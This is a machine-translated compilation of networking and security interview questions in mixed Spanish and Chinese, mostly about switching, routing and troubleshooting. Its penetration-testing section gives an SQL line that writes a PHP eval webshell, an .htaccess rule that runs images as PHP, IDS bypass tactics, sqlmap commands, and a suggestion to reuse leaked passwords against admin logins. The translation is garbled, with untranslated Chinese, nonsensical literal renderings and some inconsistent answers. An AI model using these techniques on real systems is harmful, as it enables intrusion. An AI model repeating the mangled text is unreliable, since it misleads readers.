Vulnerabilidad de permisos de lectura y escritura Vulnerabilidad de inyección SQL en el proveedor de contenido Vulnerabilidad de cruce del directorio de archivos del proveedor
Pregunta 63: Principios de protección IDS/IPS e ideas de derivación
Respuesta:
principio:
IDS工作在网络层,旁路部署,通过抓取和分析网络流量来发现攻击 IPS一般也是在网络层旁路,可以理解为具备阻断能力的IDS,是IDS的升级版(也有IDS检测到攻击通知阻断设备执行阻断动作的设备联动模式),可以覆盖网络层和应用层
绕过:
TCP分片:拆分出两个TCP包 IP分片:原理同TCP分片,但是丢包严重 程序bug/性能问题:发送大量无效包,消耗IPS性能 伪造TCP状态:绕过基于状态追踪的IPSIPV6绕过:使用IPV6地址绕过
问题64:json的csrf的利用
答案:
使用XMLHttpRequest、fetch构造出JSON请求,利用Flash的跨域与307跳转来绕过http自定义头限制
json格式的数据包可以测哪些漏洞
问题65:内网服务器,如何进行信息收集?
答案:
使用脚本收集:端口信息、服务信息 系统命令收集:域内用户可使用域命令收集域信息,net group "domain users" /domain等 端口扫描工具全段扫描 本机信息收集:管理密码、登录日志看管理员ip、服务密码收集、网段信息查看、历史记录查看 内网DNS域传送漏洞
企业常见网络安全面试题
一、常见技术类面试题
问题1:VLAN是什么?
答案:--虚拟局域网
问题2:VLAN的作用是什么?
答案:分割广播域
问题3:部署VLAN后有什么优势?
答案:
1) 限制广播域,节省带宽资源
2) 增强局域网安全性
3) 提高网络的健壮性
4) 灵活的构建局域网
问题4:VLAN有几种划分方式?
答案:
1) 基于接口
2) 基于MAC地址
3) 基于子网
4) 基于协议
问题5:企业常用的划分方式是那些?
答案:基于接口的静态划分
问题6:VLAN下的端口角色类型有几种?
答案:
1) access
2) trunk
3) hybrid
4) qinq
问题7:ACCESS和TRUNK的区别是什么?
答案:
1) Los enlaces troncales pueden admitir el reenvío de datos de múltiples VLAN al mismo tiempo y los datos transportan etiquetas VLAN (excepto VLAN nativa)
2) El enlace de acceso solo puede transmitir datos de una VLAN a la vez y la etiqueta VLAN se elimina al enviar datos.
3) Los enlaces troncales se utilizan generalmente para conectar conmutadores a conmutadores.
4) Los enlaces de acceso se utilizan generalmente para que los interruptores conecten terminales.
Pregunta 8: ¿Qué es STP? ¿Qué es MSTP?
Respuesta:
1) paso: Protocolo de árbol de expansión
2) mstp: protocolo de árbol de expansión múltiple
Pregunta 9: ¿Cuál es el papel de STP?
Respuesta: Cuando hay enlaces redundantes en la red de Capa 2, se utiliza para evitar la aparición de bucles de reenvío de Capa 2.
Pregunta 10: ¿Cuáles son las funciones del puerto y el estado del puerto de STP?
Respuesta:
1) Funciones del puerto: puerto raíz, puerto designado y puerto no designado
2) Estado del puerto: deshabilitado, bloqueando, escuchando, aprendiendo, reenviando
Pregunta 11: ¿Cuáles son las dos medidas de STP?
Respuesta:
1)桥ID :BID(Identificador de puente)
--Composición: prioridad de 16 bits (2 bytes) + dirección MAC de 48 bits (6 bytes)
--La prioridad del puente se puede configurar y personalizar manualmente. El rango es 0-61440, el valor predeterminado es 32768 y el tamaño del paso es 4096.
2) ID de puerto: PID (Identificador de puerto)
--Composición: prioridad de puerto de 4 bits + número de puerto de 12 bits (16 bits en total)
Pregunta 12: Cómo elegir el Puente Raíz (RB)
Respuesta:
1) Compare el BID del switch, el que tiene el BID más pequeño es la raíz.
--BID se compone de dos partes: prioridad + dirección MAC
Pregunta 13: ¿Cuál es la función del puerto raíz y cómo seleccionar el puerto raíz (RP)?
Respuesta:
1) Función: especialmente utilizado para recibir mensajes BPDU (recibir instrucciones del puente raíz)
2) Solo hay un puerto raíz en el conmutador no raíz (no hay ningún puerto raíz en el conmutador raíz)
Regla 1: El puerto con el menor costo desde el conmutador no raíz al conmutador raíz es el puerto raíz.
Regla 2: cuando los valores de costo para el conmutador raíz son los mismos, compare el BID del remitente
Regla 3: Cuando el valor del Costo y el valor del BID del remitente son iguales, compare el PID del remitente
Regla 4: cuando el PID del remitente también es el mismo, compare el PID del receptor
Pregunta 14: ¿Cuál es la función del puerto designado y cómo elegir el puerto designado (DP)?
Respuesta:
Función: Se utiliza específicamente para enviar mensajes BPDU (envío de instrucciones de puente raíz)
Regla 1: compare el valor de costo mínimo del conmutador raíz
Regla 2: cuando los valores de costo son los mismos, los dos conmutadores comparan BID y PID entre sí.
Ley 1: Todos los puertos del puente raíz son puertos designados
Ley 2: Un puerto en un cable de red es el puerto raíz, luego el otro puerto debe ser el puerto designado
Ley 3: Cada puerto sólo puede asumir un rol
Ley 4: Sólo hay un puerto designado en el mismo enlace
Pregunta 15: ¿Cuáles son las ventajas de MSTP en comparación con STP?
Respuesta:
1) Equilibrio de carga de datos vlan
2) Convergencia rápida
Pregunta 16: ¿Por qué RSTP converge más rápido que STP?
Respuesta:
1) Mecanismo P/A
2) Se eliminaron 3 estados del puerto: deshabilitado, bloqueando, escuchando (descartando, aprendiendo, reenviando)
3) Se agregaron 2 roles de puerto: alternativo (reemplazo), respaldo (respaldo)
Pregunta 17: ¿Qué es VRRP?
Respuesta: --Protocolo de redundancia de enrutador virtual
Pregunta 18: ¿Qué problemas puede resolver VRRP?
Respuesta: copia de seguridad de ruta
Pregunta 19: ¿Dirección de multidifusión VRRP?
Respuesta: 224.0.0.18
Pregunta 20: ¿Cuáles son los estados del VRRP?
Respuesta:
1) inicializar
2) Actividad (maestra)
3) copia de seguridad
Pregunta 21: ¿Cuáles son las funciones de los miembros del grupo VRRP?
Respuesta:
1) maestro
2) copia de seguridad
3) virtuales
Pregunta 22: ¿Cuáles son los principios para seleccionar roles activos y de respaldo de VRRP?
Respuesta:
1) Primero compare las prioridades, el que tiene mayor prioridad es el maestro.
2) Si las prioridades son consistentes, compare las direcciones IP. El que tiene la dirección IP más grande es el maestro.
Pregunta 23: ¿Breve descripción del proceso de trabajo del VRRP?
Respuesta:
1) La puerta de enlace principal envía periódicamente mensajes de notificación vrrp (mensajes de latido de capa 3)
2) Tiempo de ciclo para enviar mensajes de notificación: 1 segundo por defecto
3) La dirección de destino del mensaje de notificación es la dirección de multidifusión: 224.0.0.18
4) La puerta de enlace de respaldo monitorea el estado de la puerta de enlace principal. Después de 3 veces el "ciclo de envío", si no puede recibir el mensaje de notificación vrrp enviado por la puerta de enlace principal, la puerta de enlace de respaldo se actualizará a la "puerta de enlace principal" y asumirá la tarea de reenvío de tráfico.
Pregunta 24: ¿Qué es OSPF?
Respuesta:
--Abrir el primer protocolo del camino más corto
Pregunta 25: ¿Cuáles son las áreas de OSPF?
Respuesta:
1) OSPF introduce el concepto de área, que se divide en dos capas: área troncal y área no troncal
2) Áreas no troncales: áreas ordinarias y áreas especiales
3) área stub, área Totally Stub, área NSSA, área Totally NSSA
Pregunta 26: ¿Cuáles son las razones por las que OSPF no puede establecer relaciones de vecino?
Respuesta:
1) Las direcciones IP de capa 3 no pueden comunicarse entre sí
2) La identificación del enrutador de ambas partes es la misma
3) Los códigos de área de ambas partes son diferentes
4) Los temporizadores de saludo OSPF son diferentes
5) El temporizador muerto de OSPF es diferente
6) Las máscaras de subred son diferentes.
7) La prioridad es todo 0
8) Los bits de marca especial son diferentes.
Pregunta 27: ¿Cuáles son las ventajas de introducir áreas en OSPF?
Respuesta:
1) Reducir la cantidad de SPF y aumentar la velocidad de cálculo de la ruta
2) Conveniente para la gestión de rutas y puede realizar resúmenes y filtrado de rutas
3) Mejorar la robustez de la red: los cambios en la topología de un área determinada no afectarán a otras áreas.
Pregunta 28: ¿Cuáles son los cinco tipos de mensajes OSPF?
Respuesta:
1) Hola: se utiliza para el descubrimiento, establecimiento, mantenimiento y eliminación de vecinos.
2) DD: utilizado para sincronizar la base de datos (LSDB)
3) LSR: se utiliza para solicitar el LSA requerido a la otra parte
4) LSU: se utiliza para enviar el LSA que necesita a la otra parte.
5) LSACK: se utiliza para confirmar el LSA recibido.
Pregunta 29: ¿Cuáles son los estatus de los vecinos?
Respuesta:
1) abajo: colgar/desconectar
2) inicio: estado de inicialización;
3) bidireccional: estado de comunicación bidireccional;
4) exstart: estado de inicialización del intercambio
5) intercambio: estado de intercambio
6) cargando: cargando
7) adyacencia completa completa
Pregunta 30: proceso de trabajo de OSPF
Respuesta:
1) Crear tabla vecina
2) Sincronizar base de datos
3) Calcular la tabla de enrutamiento
Pregunta 31: ¿Qué es ACL?
Respuesta:
--Lista de control de acceso
Pregunta 32: ¿Cuál es el papel de ACL?
Respuesta:
1) Controlar el tráfico y personalizar los recursos de ancho de banda
2) Controlar el comportamiento para garantizar la seguridad de la LAN corporativa.
Pregunta 33: ¿Clasificación ACL?
Respuesta:
1) Básico-2000-2999 Cisco: Estándar: 1-99
2) Avanzado--3000-3999 Cisco: Extendido: 100-199
3) Capa 2--4000-4999 Cisco: denominación: dividida en denominación estándar y denominación extendida
4) Definido por el usuario: 5000-5999
5) Usuario--6000-6999
Pregunta 34: ¿Cuál es la composición de ACL?
Respuesta:
1) Número de regla: 0~4294967296
2) Acción: permitir/denegar
3) Elementos coincidentes (solo se introducen algunos elementos coincidentes):
--Capa 2: dirección mac de origen, dirección mac de destino, tipo de protocolo de trama Ethernet
--Tres capas: dirección IP de origen, dirección IP de destino, número de protocolo
--Capa cuatro: puerto de origen, puerto de destino
Pregunta 35: ¿Cuál es el orden de coincidencia de las ACL?
Respuesta:
1) Una ACL puede estar compuesta por múltiples declaraciones de denegación | permiso
2) Cada declaración describe una regla, por lo que se pueden incluir varias reglas bajo un número de ACL.
3) Pero puede haber duplicación o contradicción en estas reglas.
# regla 10 denegar fuente de ip 192.168.1.1 0
# regla 20 permitir fuente de IP 192.168.1.0 0.0.0.255
4) El orden de coincidencia de acl predeterminado de los equipos Huawei es el modo de configuración
@orden coincidente:
--Hacer coincidir los paquetes según los números de las reglas ACL en orden ascendente (cuanto menor sea el número, la prioridad)
--Deténgase al hacer coincidir y realice acciones de permitir o denegar de acuerdo con los requisitos de las reglas
--Si un paquete no coincide con la primera entrada en la lista acl, continúe haciendo coincidir la segunda entrada hacia abajo
--Si ninguna de las entradas en la lista acl coincide, ejecute la regla implícita
--Hay dos reglas implícitas, una es negarlo todo y la otra es permitirlo todo.
Pregunta 36: reglas implícitas de ACL
Respuesta:
1) Huawei permite todas las reglas coincidentes
@ Cuando acl y el filtro de tráfico están vinculados
@Y, cuando un paquete de datos no coincide con ninguna regla en la lista acl
2) Huawei rechaza todas las reglas coincidentes
@Cuando acl no está vinculado con el filtro de tráfico, todos se rechazan
#Cuando acl está asociado con nat, cuando acl está asociado con el enrutamiento de políticas y cuando acl está asociado con vty
Pregunta 37: Características de ACL
Respuesta:
1) ACL no tiene ningún efecto sobre el tráfico de origen del dispositivo en sí, sino solo sobre el tráfico que pasa.
Pregunta 38: ¿Qué es NAT?
Respuesta: --Traducción de direcciones de red
Pregunta 39: El papel de NAT
Respuesta:
1) Lograr la comunicación entre una gran cantidad de hosts de intranet y la red pública bajo la premisa de guardar direcciones IPv4
2) Proteger la intranet hasta cierto punto y ocultar la red y la IP de la empresa.
Pregunta 40: Clasificación de NAT
Respuesta:
1) napt----para grandes empresas
2) easy-ip (para pequeñas empresas) utilice la interfaz de salida para NAT
3) servidor nat --- mapeo de puertos, para algunos protocolos especiales, la función NAT ALG debe estar activada
Pregunta 41: ¿Qué es DHCP?
Respuesta: --Protocolo de configuración dinámica de host
Pregunta 42: función de DHCP
Respuesta:
1) cliente DHCP
2) servidor DHCP
3) retransmisión DHCP
Pregunta 43: Acceso DHCP por primera vez
Respuesta:
1) El cliente transmite un mensaje de descubrimiento de DHCP (descubrir) ----- buscando un servidor DHCP
2) Una vez que el servidor lo recibe, unidifundirá un mensaje de respuesta DHCP (oferta) en respuesta a la solicitud DHCP del cliente.
3) El cliente envía un mensaje de solicitud DHCP (solicitud) en una transmisión para solicitar una dirección IP alquilada.
4) Después de que el servidor lo reciba, emitirá una respuesta al mensaje de confirmación de DHCP del cliente (ack) ---- arrendando la dirección IP al cliente
De hecho, hay dos acciones más en este proceso, que son muy críticas.
Nota 1: Cuando el servidor DHCP asigna una dirección IP al host, puede realizar la detección de ping ICMP.
El propósito de la detección es garantizar que las direcciones IP que distribuye sean libres y no tengan conflictos, para evitar causar conflictos con los clientes y no poder acceder a Internet.
¿Por qué? ¿DHCP no sabe qué direcciones IP ha distribuido? Por supuesto que lo sé, pero hay circunstancias especiales.
Un caso especial es que algunas computadoras pueden configurar manualmente direcciones IP estáticas. Este servidor DHCP no se puede controlar, por lo que podemos realizar la detección de ping.
[DHCP-R1]Paquete de ping 3 del servidor dhcp //Configurar la detección de icmp
[DHCP-R1]tiempo de espera de ping del servidor dhcp 1000 //Configurar el tiempo de espera de detección
Nota 2: Después de que el cliente recibe el mensaje de confirmación ACK enviado por el servidor,
De hecho, no tienes que preocuparte por eso, tienes que enviar ARP gratis (el arp cuya dirección de destino es tu propia dirección IP).
Detecte si la dirección que le asignó DHCP es utilizada por otros, si la dirección MAC resuelta es su propia dirección MAC, se sentirá tranquilo.
2. Nota: Las preguntas de la entrevista extendida son solo como referencia.
Pregunta 44: Tipos de enrutadores IS-IS
Respuesta:
1) enrutador de nivel 1
2) enrutador de nivel 2
3) enrutador de nivel 1-2
Pregunta 45: El EI-EI establece una relación de vecindad
Respuesta:
1) Sólo los enrutadores adyacentes en el mismo nivel pueden convertirse en vecinos.
2) Para enrutadores de nivel 1, los números de área deben ser consistentes.
3) Los tipos de red de las interfaces IS-IS en ambos extremos del enlace deben ser consistentes
4) Las direcciones de las interfaces IS-IS en ambos extremos del enlace deben estar en el mismo segmento de red.
Pregunta 46: Tipos de mensajes IS-IS
Respuesta:
1) Hola: mensaje de saludo, utilizado para establecer y mantener relaciones con vecinos, también llamado IIH
2) LSP: mensaje de estado del enlace LSP, utilizado para intercambiar información sobre el estado del enlace
3) SNP: mensaje de número de secuencia SNP, SNP incluye mensaje de número de secuencia completo CSNP y mensaje de número de secuencia parcial PSNP
Pregunta 47: Diferencias entre IS-IS y OSPF
Respuesta:
1) El protocolo IS-IS solo admite dos tipos de red y el protocolo OSPF admite cuatro tipos de red.
2) El protocolo IS-IS se divide en áreas L1/L2. L2 es el área troncal con todas las rutas detalladas. Sólo hay una ruta predeterminada de L1 a L2. OSPF se divide en áreas troncales, comunes y especiales. El acceso entre regiones entre áreas comunes y áreas especiales requiere pasar por el área troncal.
3) El tipo de mensaje del protocolo IS-IS es solo mensaje LSP, que es simple y eficiente y no requiere cálculo recursivo. Los tipos de LSA del protocolo OSPF son diversos, incluidos los tipos 1/2/3/4/5/7, etc., que requieren cálculos recursivos y son adecuados para cálculos de programación detallados.
4) El protocolo ISIS converge relativamente rápido y la sobrecarga de mensajes para calcular el enrutamiento es relativamente pequeña. El protocolo OSPF es relativamente engorroso y complicado.
5) El protocolo ISIS utiliza transmisión TLV, que tiene una estructura simple y es fácil de expandir. El protocolo OSPF admite IPv4 e IPv6. El protocolo OSPF tiene dos versiones independientes (OSPFv2 y OSPFv3).
Pregunta 48: ¿Qué es BGP?
Respuesta:
1) BGP: Protocolo de puerta de enlace fronteriza
2) BGP es un protocolo estándar público y es compatible con los equipos de cualquier fabricante.
3) Está ubicado en la capa 7 (capa de aplicación) del modelo OSI, la capa inferior usa el protocolo TCP y el número de puerto es 179.
Pregunta 49: Cinco tipos de mensajes BGP
Respuesta:
1) mensaje abierto: utilizado para establecer relaciones de vecino
2) mantener vivo: se utiliza para mantener las relaciones con los vecinos (enviar periódicamente, mantener la conexión bgp)
3) actualización: se utiliza para actualizar la información de ruta
4) notificación: mensaje de error, utilizado para desconectar la conexión bgp
5) actualización del enrutador: solicita a los vecinos que reenvíen información de enrutamiento
Pregunta 50: Seis estados de BGP
Respuesta:
1) inactivo: estado de inicialización
2) conectar: estado de la conexión tcp
3) activo: estado activo
4) abierto enviado: se ha enviado el mensaje abierto estado: se ha enviado el mensaje abierto al vecino
5) confirmación abierta: estado de confirmación del mensaje abierto
6) establecido: La conexión ha sido establecida.
Pregunta 51: Principios de notificación BGP
Respuesta:
1) Envíe únicamente sus mejores entradas de enrutamiento a los vecinos
2) La ruta óptima obtenida a través de EBGP se publica para todos los vecinos BGP.
3) La ruta óptima obtenida a través de IBGP no se publicará a otros vecinos de IBGP (prevención de bucle efectiva de horizonte dividido)
4) Sincronización BGP e IGP (desactivada por Huawei de forma predeterminada)
Número 52: Solución IBGP Split Horizon
Respuesta:
1) Interconexión completa BGP
2) Alianza BGP
3) Reflector de ruta
Pregunta 53: Lista 2 atributos obligatorios reconocidos por BGP
Respuesta:
1) Atributo de origen: define la fuente de información de la ruta
2) Atributo AS_path: Registra en orden los números AS que pasa una ruta desde la dirección de origen a la dirección de destino.
3) Next_Hop: define la información del próximo salto de la ruta.
Pregunta 54: ¿Qué es MPLS?
Respuesta:
1) MPLS: conmutación de etiquetas multiprotocolo
Pregunta 55: Arquitectura de red MPLS:
Respuesta:
1) Un enrutador que realiza conmutación de etiquetas se llama LSR (Label Switch Router)
2) El área construida por múltiples enrutadores LSR se llama área mpls
--LER--ingreso: nodo de entrada---empuje de etiquetas---dispositivo de borde de área mpls
--lSR--transit: nodo intermedio---reenvío
--LER--salida: nodo de salida---etiqueta emergente---dispositivo de borde de área mpls
Pregunta 56: En MPLS, ¿qué es LSP?
Respuesta:
1) LSP: ruta de cambio de etiquetas: para utilizar etiquetas para reenviar datos, primero debe establecer un LSP y luego reenviar los datos de la etiqueta.
Pregunta 57: rango de asignación de etiquetas MPLS
Respuesta:
1) 0--15: etiquetas especiales
2) 16--1023: Generalmente la etiqueta utilizada en la creación de lsp estático
3) 1024---arriba: generalmente la etiqueta utilizada para crear lsp dinámico
Pregunta 58: Método de publicación de etiquetas MPLS:
Respuesta:
1) Modo DU: modo activo descendente --- predeterminado de Huawei
2) Método DoD: método posterior bajo demanda
Pregunta 59: Método de distribución de etiquetas MPLS:
Respuesta:
1) Método de asignación independiente (Independiente)
2) Método de distribución ordenada
60. Cómo guardar etiquetas MPLS:
1)libral: forma gratuita: guardar todo
2) conservador: forma conservadora: guardar lo mejor
3. Preguntas comunes de la entrevista para la solución de problemas
Pregunta 1: ¿Cuáles son las razones por las que la computadora no se puede encender? ¿Cuáles son sus ideas para solucionar problemas?
Respuesta: fuente de alimentación, placa base, CPU, memoria, electricidad estática, disco duro, sistema
Pregunta 2: ¿Cuáles son las razones del retraso de la computadora? ¿Cuál es su solución?
Respuesta:
1) Optimizar elementos de inicio
2) Optimice la fragmentación del disco y limpie la basura
3) Optimizar servicios y procesos
4) antivirus
5) Aumentar la memoria
6) Reemplace la unidad de estado sólido
Pregunta 3: ¿Cuáles son las razones por las que una computadora no puede acceder a Internet? ¿Cuáles son sus ideas para solucionar problemas?
Respuesta:
1) Verifique la línea (probador de línea): ¿es una cruz roja o un signo de exclamación en la esquina inferior derecha de la computadora, o se muestra normalmente? Verifique si la cabeza de cristal está oxidada y si existe el controlador de la tarjeta de red.
2) Verifique si se puede obtener la dirección IP y si la dirección IP obtenida es legal (ipconfig /release ipconfig /renew)
3) Restablecer el restablecimiento de winsock de red del servicio tcp/ip
4) Verifique si hay ataques de suplantación de identidad de dhcp y suplantación de identidad de arp en la LAN
5) Compruebe si está restringido por la gestión del comportamiento en Internet.
6) Verifique si hay infección por virus y desinfecte
7) Utilice el método de eliminación para reemplazar la computadora, el cable de red, la tarjeta de red y la interfaz del conmutador.
Pregunta 4: Decenas de ordenadores del departamento no pueden acceder a Internet. ¿Cuáles son las razones? ¿Qué piensas?
Respuesta:
1) Confirme si la computadora defectuosa pertenece a la misma VLAN y está conectada al mismo conmutador
2) Verifique el estado, la configuración, los puertos y el tráfico del conmutador de capa de acceso. Verifique si la comunicación con el conmutador de enlace ascendente es normal. Verifique el conmutador de enlace ascendente.
3) Compruebe si hay ataques de suplantación de identidad de dhcp en la intranet
4) Verifique si hay un bucle de Capa 2 en la intranet
5) Verifique si hay un ataque arp en la intranet
6) Buscar virus y troyanos
7) Compruebe si existen restricciones a la gestión del comportamiento en línea.
Pregunta 5: Toda la empresa no puede acceder a Internet. ¿Cuáles son las razones? ¿Cómo se puede determinar rápidamente la causa del fallo?
Respuesta:
1) Verifique si la computadora puede obtener una dirección IP legal
2) Verifique el estado, la configuración y las interfaces del conmutador central
3) Verifique el estado, la configuración y la interfaz del firewall de salida
4) Utilice ping para realizar pruebas, haga ping al núcleo, haga ping al puerto de red interno del firewall, haga ping al puerto de red externo del firewall, haga ping a la dirección de puerta de enlace de la red pública y haga ping a la dirección DNS de la red pública.
5) Verifique si hay un ataque de red o secuestro de red
4. Preguntas de la entrevista de conocimientos generales 1
Pregunta 1: ¿Cuáles fueron sus principales responsabilidades en su última empresa y cuál era su trabajo principal todos los días?
Respuesta: Respuesta basada en la descripción de la experiencia laboral en el currículum.
Pregunta 2: ¿Cómo se realizan las inspecciones diarias de operación y mantenimiento?¿Cuáles son sus inquietudes?
Respuesta:
1) Inspección del entorno de la sala de ordenadores (temperatura, humedad, polvo, electricidad estática, aire acondicionado, IPS, red eléctrica, protección contra incendios, impermeabilidad, protección contra rayos)
2) Verificación del estado operativo del equipo.
3) Verificación del contenido del puerto del dispositivo
4) Ejecutar verificación comercial
5) Inspección de protección de seguridad
6) Confirme si la empresa ha implementado una plataforma esight, plataforma zabbix, etc.
Pregunta 3: ¿Puedes dibujar el diagrama de topología de red de tu última empresa?
Respuesta: Edraw, visio, demasiado software
Pregunta 4: ¿Qué equipos de fabricantes ha utilizado, específicamente qué modelos?
Respuesta: Se ha convertido en un ejemplo: vaya a los sitios web oficiales de Huawei, H3C, Ruijie, Tianrongxin, Sangfor, Venus, Cisco y Digital China para comprobarlo.
1) serie s1700
2) serie s2700
3) serie s3700
4) serie s5700 como s5720 s5730
5) serie s6700
6) Serie s7700 como s7703 s7706 s7710 s7712
7) serie s9700
8) serie s12700
9) serie s12800
Pregunta 5: ¿Cómo determinar si hay un bucle en la red del conmutador de capa 2?
Respuesta:
1) A través del resumen de la interfaz de visualización | incluya el comando up, cerca del 100%,
2.) Determine si hay una desviación de la dirección MAC en el conmutador
− Puede ejecutar display mac-address varias veces para observar si la dirección MAC se aprende en diferentes interfaces del conmutador.
5. Preguntas de la entrevista de conocimientos generales 2
Pregunta 1: ¿Ha encontrado algún problema en el trabajo y cómo lo resolvió?
Respuesta: Responda en base a la experiencia laboral descrita en su currículum, puede acudir al foro técnico con anticipación para buscar soluciones de trabajos de operación y mantenimiento.
Pregunta 2: ¿Está familiarizado con los sistemas oa/erp/crm/email/videoconferencia? ¿Conoce esos fabricantes?
Respuesta: Zhiyuan, Fanwei, sap, UFIDA, Kingdee, Inspur...
Pregunta 3: ¿Está familiarizado con la cobertura inalámbrica? ¿Cómo implementar la cobertura inalámbrica? ¿Puede describirlo brevemente?
Respuesta:
1) Modo de conmutación de fuente de alimentación AP+AC+POE
2) Confirmar el entorno y confirmar el efecto de penetración de la señal.
3) Confirme el método de implementación, montado en la pared y en el techo.
4) Confirme la cantidad de puntos de información, la cantidad de AP, la cantidad de AC y la cantidad de conmutadores POE
5) Enrutamiento, roaming inalámbrico, cobertura inalámbrica completa, interferencia de canales y certificación de seguridad
Pregunta 4: ¿Cómo controlar el comportamiento online de los empleados dentro de la empresa?¿Tiene algún buen método?
Respuesta: gestión del comportamiento en Internet
6. Preguntas comunes de entrevista para puestos de pruebas de penetración (conocimientos no relacionados con el curso, solo como referencia)
Pregunta 1: Después de probar una estación, ¿qué crees que deberías hacer primero?
Respuesta: --Recopilar información: whois, IP de origen del sitio web, sitio secundario, sitio web del segmento C, versión del sistema del servidor, versión del contenedor, versión del programa, tipo de base de datos, nombre de dominio de segundo nivel, firewall, información del mantenedor se discutirá por separado. .
Pregunta 2: Durante el proceso de penetración, ¿qué valor nos aporta recopilar las direcciones de correo electrónico de los registrantes del sitio objetivo?
Respuesta:
1) Introdúzcalo en la base de datos del trabajador social para ver si hay alguna contraseña filtrada y luego intente usar la contraseña filtrada para iniciar sesión en el backend.
2) Utilice el correo electrónico como palabra clave para ingresar en los motores de búsqueda.
3) Utilice la información relacionada buscada para encontrar otras direcciones de correo electrónico y obtener cuentas sociales de uso común.
4) El trabajador social descubre la cuenta social y puede descubrir el hábito del administrador de establecer contraseñas.
5) Utilice la información existente para generar un diccionario dedicado.
6) Observe qué sitios web no populares visita con frecuencia el administrador y, si los elimina, obtendrá más cosas buenas.
Pregunta 3: ¿Contenedores de servidores de sitios web comunes?
Respuesta:
--IIS, Apache, nginx, Tomcat, weblogic, jboss
Pregunta 4: Obtuve un webshell y descubrí que hay un archivo .htaccess en el directorio raíz del sitio web, ¿qué podemos hacer?
Respuesta: --Hay muchas cosas que se pueden hacer, usemos Hidden Net Horse como ejemplo:
插入<FilesMatch "xxx.jpg"> aplicación SetHandler/x-httpd-php </FilesMatch>
Los archivos .jpg se analizarán en archivos .php
Pregunta 5: ¿La vulnerabilidad de inyección solo puede verificar la contraseña de la cuenta?
Respuesta: Puedes quitarte los pantalones, cargar webshell y ejecutar comandos.
Pregunta 6: ¿El perro de seguridad rastreará las variables y descubrirá que es un troyano de una sola frase?
Respuesta: --Se basa en la firma, por lo que es fácil de omitir.
Pregunta 7: ¿Cuál es la diferencia entre CSRF, SSRF y ataques de repetición?
Respuesta:
1) CSRF es un ataque de falsificación de solicitudes entre sitios, iniciado por el cliente
2)SSRF es una falsificación de solicitudes del lado del servidor, iniciada por el servidor
3) El ataque de reproducción consiste en reproducir los paquetes de datos interceptados para lograr la autenticación de identidad y otros fines.
Pregunta 8: Nombre al menos tres vulnerabilidades de la lógica empresarial y cómo solucionarlas.
Respuesta:
1) Hay contraseñas en la vulnerabilidad de recuperación de contraseñas que permiten el descifrado por fuerza bruta, hay credenciales de recuperación universales, se puede omitir el paso de verificación, las credenciales de recuperación se pueden interceptar y recuperar, etc. para obtener la contraseña a través de la función de recuperación de contraseña proporcionada por el fabricante.
2) Las vulnerabilidades de autenticación de identidad más comunes son los ataques de fijación de sesión y la falsificación de cookies. Siempre que se obtenga la sesión o la cookie, se puede falsificar la identidad del usuario.
3) El código de verificación en la vulnerabilidad del código de verificación permite el descifrado por fuerza bruta. El código de verificación se puede omitir mediante Javascript o modificación del paquete.
Pregunta 9: ¿Cuáles son las herramientas de penetración que utiliza habitualmente y cuál es la más utilizada?
Respuesta:
burpsuit,appscan,avwvs,sqlmap,fiddler等
Pregunta 10: Cuéntenos sobre las plataformas de seguridad a las que suele prestar atención.
Respuesta:
Por ejemplo, tools.net, 90sec, Prophet Community, Safe Guest, freebuf, etc.
Pregunta 11: sqlmap, ¿cómo inyectar un punto de inyección?
Respuesta:
1) Si es un modelo get, use directamente sqlmap -u "como la URL".
2) Si es un tipo de publicación como un punto, puede sqlmap -u "URL del punto de inyección" --data="parámetros de publicación"
3) Si es una cookie, X-Forwarded-For, etc., cuando sea accesible, use burpsuite para capturar el paquete, reemplace el punto de inyección con *, colóquelo en el archivo y luego sqlmap -r "dirección del archivo "
Pregunta 12: ¿Cuáles son los tipos de inyección SQL?
Respuesta:
1) Error de inyección
2) inyección tipo bool
3) Inyección retrasada
4) Inyección de bytes anchos
Pregunta 13: ¿Qué tienen en común la inyección ciega y la inyección retardada?
Respuesta:
Todo se juzga carácter por carácter.
Pregunta 14: ¿Cuáles son las funciones para la inyección SQL y la escritura de archivos?
Respuesta:
(1) seleccione 'oración' en la 'ruta' del archivo de salida
(2) seleccione 'frase' en la 'ruta' del archivo de volcado
(3) seleccione '<?php eval($_POST[1]) ?>' en el archivo de volcado'd:\wwwroot\baidu.com\nvhack.php';
Pregunta 15: ¿Cuáles son las vulnerabilidades de owasp?
Respuesta:
1) Métodos de protección de inyección SQL:
2) Autenticación de identidad fallida y gestión de sesiones
3) Ataque de secuencias de comandos entre sitios XSS
4) Referencia directa a objetos inseguros.
5) Error de configuración de seguridad
6) Fuga de información sensible
7) Falta de control de acceso a nivel funcional
8) CSRF de falsificación de solicitudes entre sitios
9) Utilice componentes que contengan vulnerabilidades conocidas
10) Redirecciones y reenvíos no verificados
Pregunta 16: ¿Método de protección contra inyección SQL?
Respuesta:
1) Utilice API seguras
2) Escapar de los caracteres especiales de entrada.
3) Utilice listas blancas para estandarizar los métodos de validación de entradas
4) Controlar la entrada del cliente y no permitir la entrada de caracteres especiales relacionados con la inyección SQL.
5) El lado del servidor filtra, escapa, reemplaza y elimina caracteres especiales antes de enviarlos a la base de datos para consultas SQL.
Pregunta 17: Describa brevemente lo que se debe hacer para fortalecer la seguridad de los sistemas Linux.
Respuesta:
1. Política de seguridad de contraseñas
2. Cerrar puertos y servicios innecesarios
3. Configuración de permisos de archivos, etc.
Pregunta 18: ¿Qué herramientas utiliza para determinar si hay una puerta trasera en el sistema?
Respuesta:
Ataque pchunter para ver procesos y servicios
Pregunta 19: ¿Qué es Selinux para Linux?
Respuesta:
¿Cómo configurar Selinux? SELinux es un subsistema de seguridad que controla los programas para que solo accedan a archivos específicos.
Utilice la herramienta de configuración para ingresar a la búsqueda gráfica de apagado o modificar el archivo /etc/sysconfig/selinux SELINUX=disabled
Abra el firewall usando el servicio iptables start o /etc/init.d/iptables start
Pregunta 20: Entre los permisos de la tabla MySQL, además de agregar, eliminar, modificar, verificar y leer y escribir archivos, ¿qué otros permisos existen?
Respuesta:
Ordenar, consultar, indexar, etc.
Pregunta 21: ¿Cómo garantizar la seguridad de MySQL?
Respuesta:
Seguridad de permisos de cuenta MySQL
Configuración de seguridad de red de datos Mysql
Seguridad de la política de contraseñas
registro de mysql
Configuración de seguridad del host donde se encuentra el servicio de base de datos Mysql
Implementar módulos de defensa y detección de inyección SQL
Opciones de inicio relacionadas con la seguridad de MySQL
estrategia de copia de seguridad de mysql
Pregunta 22: ¿Qué bibliotecas se incluyen en la base de datos mysql de forma predeterminada? ¿Nombra la biblioteca?
Respuesta:
1.Biblioteca mysql, que almacena información del usuario y de otro tipo.
